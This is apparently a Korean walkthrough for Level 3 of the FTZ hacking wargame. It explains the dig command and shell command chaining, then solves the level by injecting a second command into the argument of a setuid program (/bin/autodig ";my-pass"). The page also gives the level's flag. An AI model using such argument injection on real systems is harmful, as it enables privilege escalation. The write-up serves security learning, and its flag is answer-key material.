[FTZ] Level 3

Backgrounds

Linux Commands

dig

dig 명령어는 DNS 서버에 대한 정보를 얻는 데 사용한다.

dig @8.8.8.8 www.google.com

위 명령어로 구글 public dns인 8.8.8.8을 지정해 google.com을 질의할 수 있다.

한 줄에 여러 명령어 실행

쉘에서 한 줄에 여러 명령어를 실행하려면 다음과 같이 사용한다.

[CMD1]; [CMD2]

문자열 형태로 명령어 전달

문자열 형태로 명령어를 전달하려면 다음과 같이 사용한다.

"[CMD]"

Solution

find / -user level4 2> /dev/null

위 명령어로 소유자가 level 4인 파일을 찾는다. 실행 결과 /bin/autodig을 찾을 수 있다. /bin/autodig은 dig에 전달하는 인자를 하나 가지는데, 해당 위치를 다음과 같이 문자열로 치환한다.

/bin/autodig ";my-pass"

이를 통해 level4에서 my-pass을 얻을 수 있다.

Flag

suck my brain

Reference

• dig 명령어 https://carpfish.tistory.com/